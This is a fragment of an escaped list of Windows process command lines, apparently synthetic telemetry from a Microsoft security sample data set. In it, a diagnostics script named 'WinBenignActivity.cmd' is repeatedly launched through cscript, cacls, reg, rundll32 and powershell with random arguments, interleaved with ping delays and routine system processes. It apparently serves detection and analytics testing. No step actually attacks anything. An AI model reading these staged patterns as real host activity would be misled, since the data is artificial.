\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26149 \",\"ping  127.0.0.1 -n 24 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"rundll32  \\\\32641\\\\32360.exe\",\"ping  127.0.0.1 -n 24 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14433 c:\\\\temp\\\\8937\\\\1760.ps1\",\"ping  127.0.0.1 -n 24 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 11 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 20 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 11 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe UserCxt\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\compattelrunner.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" Scan -ScheduleJob -ScanTrigger 55\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 13 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -15216 /12420\",\"ping  127.0.0.1 -n 19 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 5 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -29637\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29637\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30962 /15074\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3232\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25774 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\28790\\\\506.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9748 c:\\\\temp\\\\3830\\\\20559.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 8 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 3 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -11581 \",\"ping  127.0.0.1 -n 2 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 29 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\5728\\\\16265.exe\",\"ping  127.0.0.1 -n 22 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -20225 c:\\\\temp\\\\5291\\\\16396.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -20225 c:\\\\temp\\\\5291\\\\16396.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 22 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9528 /16911\",\"ping  127.0.0.1 -n 22 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -27468\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -23226 \",\"ping  127.0.0.1 -n 22 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"rundll32  \\\\5914\\\\3172.exe\",\"ping  127.0.0.1 -n 22 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15059 c:\\\\temp\\\\32400\\\\30510.ps1\",\"ping  127.0.0.1 -n 22 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 25 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 32 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 2 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 16 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -981 /7488\",\"ping  127.0.0.1 -n 20 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 24 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -3759\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3759\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1796 /27802\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2134\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4277 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\25124\\\\21095.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32665 c:\\\\temp\\\\25833\\\\20704.ps1\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 3 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 10 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -417 \",\"ping  127.0.0.1 -n 10 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 13 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 22 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\15930\\\\31294.exe\",\"ping  127.0.0.1 -n 20 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -12578 c:\\\\temp\\\\17955\\\\32530.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -12578 c:\\\\temp\\\\17955\\\\32530.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 20 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18358 /18002\",\"ping  127.0.0.1 -n 20 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6872\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22331 \",\"ping  127.0.0.1 -n 20 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"rundll32  \\\\24611\\\\27906.exe\",\"ping  127.0.0.1 -n 20 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9507 c:\\\\temp\\\\32250\\\\13043.ps1\",\"ping  127.0.0.1 -n 20 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 6 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 11 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 26 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 18 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -19514 /2556\",\"ping  127.0.0.1 -n 21 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 11 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -10650\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10650\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11149 /8068\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2525\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2780\\\" \\\"1640\\\" \\\"1628\\\" \\\"1644\\\" \\\"0\\\" \\\"0\\\" \\\"1648\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21826 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32  \\\\10012\\\\26584.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4605 c:\\\\temp\\\\20191\\\\30968.ps1\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"3760\\\" \\\"1628\\\" \\\"1608\\\" \\\"1632\\\" \\\"0\\\" \\\"0\\\" \\\"1636\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 30 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 21 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -22022 \",\"ping  127.0.0.1 -n 18 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\26132\\\\13555.exe\",\"ping  127.0.0.1 -n 18 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -4931 c:\\\\temp\\\\30620\\\\15896.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -4931 c:\\\\temp\\\\30620\\\\15896.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 18 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26958 /15519\",\"ping  127.0.0.1 -n 18 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -8210\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21175 \",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"rundll32  \\\\21814\\\\15398.exe\",\"ping  127.0.0.1 -n 18 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3521 c:\\\\temp\\\\18194\\\\26595.ps1\",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"taskhostw.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe RefreshSettings\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files 